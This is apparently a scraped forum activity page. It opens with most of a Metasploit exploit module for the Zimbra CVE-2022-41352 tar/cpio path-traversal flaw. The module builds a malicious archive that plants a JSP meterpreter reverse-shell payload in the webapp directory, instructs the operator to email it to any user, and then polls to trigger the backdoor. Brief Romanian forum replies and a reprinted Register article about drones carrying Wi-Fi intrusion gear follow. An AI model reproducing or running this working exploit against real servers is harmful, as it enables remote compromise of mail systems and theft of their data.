'References' => [ ['CVE', '2022-41352'], ['URL', 'https://forums.zimbra.org/viewtopic.php?t=71153&p=306532'], ['URL', 'https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/'], ['URL', 'https://www.openwall.com/lists/oss-security/2015/01/18/7'], ['URL', 'https://lists.gnu.org/archive/html/bug-cpio/2015-01/msg00000.html'], ['URL', 'https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis'], ['URL', 'https://attackerkb.com/topics/FdLYrGfAeg/cve-2015-1197/rapid7-analysis'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34'], ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Zimbra Collaboration Suite', {} ] ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'TARGET_PATH' => '/opt/zimbra/jetty_base/webapps/zimbra/', 'TARGET_FILENAME' => nil, 'DisablePayloadHandler' => false, 'RPORT' => 443, 'SSL' => true }, 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2022-06-28', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'payload.tar']), # Separating the path, filename, and extension allows us to randomize the filename OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (an absolute path - eg, /opt/zimbra/...).']), OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: public/<random>.jsp).']), ] ) register_advanced_options( [ OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (default: random)']), OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]), # Took this from multi/handler OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]), OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ]) ] ) end def exploit print_status('Encoding the payload as .jsp') payload = Msf::Util::EXE.to_jsp(generate_payload_exe) # Small sanity-check if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?') end # Generate a filename if needed target_filename = datastore['TARGET_FILENAME'] || "public/#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp" symlink_filename = datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10) # Sanity check - the file shouldn't exist, but we should be able to do requests to the server if datastore['TRIGGER_PAYLOAD'] print_status('Checking the HTTP connection to the target') res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_filename) ) unless res fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)') end # Break when the file successfully appears unless res.code == 404 fail_with(Failure::Unknown, "Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}") end end # Create the file begin contents = StringIO.new Rex::Tar::Writer.new(contents) do |t| print_status("Adding symlink to path to .tar file: #{datastore['TARGET_PATH']}") t.add_symlink(symlink_filename, datastore['TARGET_PATH'], 0o755) print_status("Adding target file to the archive: #{target_filename}") t.add_file(File.join(symlink_filename, target_filename), 0o644) do |f| f.write(payload) end end contents.seek(0) tar = contents.read contents.close rescue StandardError => e fail_with(Failure::BadConfig, "Failed to encode .tar file: #{e}") end file_create(tar) print_good('File created! Email the file above to any user on the target Zimbra server') # Bail if they don't want the payload triggered return unless datastore['TRIGGER_PAYLOAD'] register_file_for_cleanup(File.join(datastore['TARGET_PATH'], target_filename)) interval = datastore['CheckInterval'].to_i print_status("Trying to trigger the backdoor @ #{target_filename} every #{interval}s [backgrounding]...") # This loop is mostly from `multi/handler` stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i timeout = datastore['ListenerTimeout'].to_i loop do break if session_created? break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_filename) ) unless res fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload') end # Break when the file successfully appears if res.code == 200 print_good('Successfully triggered the payload') # This should break when we get to session_created? end Rex::ThreadSafe.sleep(interval) end end end # 0day.today [2022-10-21] # Source: 0day.today
  21. Kev
    eu cred ca vrei sa-ti bati nevasta si nu ai motive, BDSM< Liveleak, etc... invata in timp si de 314zda, ... oaza s.a.m.d. sunt legit app-uri pentru Android, iOS etc... platesti, ii cenzurezi aplicatiile mentionate mai sus copilului si poti dormi linistit.
  22. Kev
    Check your rooftops: Flying gear caught carrying network-intrusion kit Modified off-the-shelf drones have been found carrying wireless network-intrusion kit in a very unlikely place. The idea of using consumer-oriented drones for hacking has been explored over the past decade at security conferences like Black Hat 2016, in both the US and in Europe. Naomi Wu, a DIY tech enthusiast, demonstrated a related project called Screaming Fist in 2017. And in 2013, security researcher Samy Kamkar demonstrated his SkyJack drone, which used a Raspberry Pi to take over other drones via Wi-Fi. Now these sort of attacks are actually taking place. Greg Linares, a security researcher, recently recounted an incident that he said occurred over the summer at a US East Coast financial firm focused on private investment. He told The Register that he was not involved directly with the investigation but interacted with those involved as part of his work in the finance sector. The Register corresponded with an individual affiliated with the affected company who corroborated Linares's account and asked not to be identified owing to a non-disclosure agreement and employment concerns. In a Twitter thread, Linares said the hacking incident was discovered when the financial firm spotted unusual activity on its internal Atlassian Confluence page that originated from within the company's network. The company's security team responded and found that the user whose MAC address was used to gain partial access to the company Wi-Fi network was also logged in at home several miles away. That is to say, the user was active off-site but someone within Wi-Fi range of the building was trying to wirelessly use that user's MAC address, which is a red flag. The team then took steps to trace the Wi-Fi signal and used a Fluke system to identify the Wi-Fi device. "This led the team to the roof, where a 'modified DJI Matrice 600' and a 'modified DJI Phantom' series were discovered," Linares explained. The Phantom drone was in fine condition and had a modified Wi-Fi Pineapple device, used for network penetration testing, according to Linares. The Matrice drone was carrying a case that contained a Raspberry Pi, several batteries, a GPD mini laptop, a 4G modem, and another Wi-Fi device. It had landed near the building's heating and ventilation system and appeared to be damaged but still operable. "During their investigation, they determined that the DJI Phantom drone had originally been used a few days prior to intercept a worker's credentials and Wi-Fi," Linares said. "This data was later hard coded into the tools that were deployed with the Matrice." According to Linares, the tools on the drones were used to target the company's internal Confluence page in order to reach other internal devices using the credentials stored there. The attack, he said, had limited success and is the third cyberattack involving a drone he's seen over the past two years. "The attackers specifically targeted a limited access network, used by both a third-party and internally, that was not secure due to recent changes at the company (e.g. restructuring/rebranding, new building, new building lease, new network setup or a combination of any of these scenarios)," Linares told The Register. "This is the reason why this temporary network unfortunately had limited access in order to login (credentials + MAC security). The attackers were using the attack in order to access an internal IT confluence server that contained other credentials for accessing other resources and storing IT procedures." Long-term problem comes to life Linares said he had worked on a drone project in 2011 to test network attack capabilities and at the time, power, carry weight, and range were limiting factors. "We revisited it again in 2015 and drone tech had come a long way," he said. "Now in 2022 we are seeing really amazing drone advancements in power, range, and capabilities (for instance, the amazing synchronized drone shows that China puts out are utterly fantastic)." "This paired with drone payload options getting smaller and more capable – e.g. Flipper Zero kit – ... make viable attack packages that are reasonable to deploy," said Linares. "Targets in fintech/crypto and supply chain or critical third-party software suppliers would make ideal targets for these attacks where an attacker can easily cover their initial operating costs with immediate financial gain or access to more lucrative targets." Via theregister.com
  23. Kev
    Armitage?
  24. Kev
    Sterge cache si cookies
  25. Kev
    Coreea de nord.are blur in G map PS: n-am auzit video
×
×
  • Create New...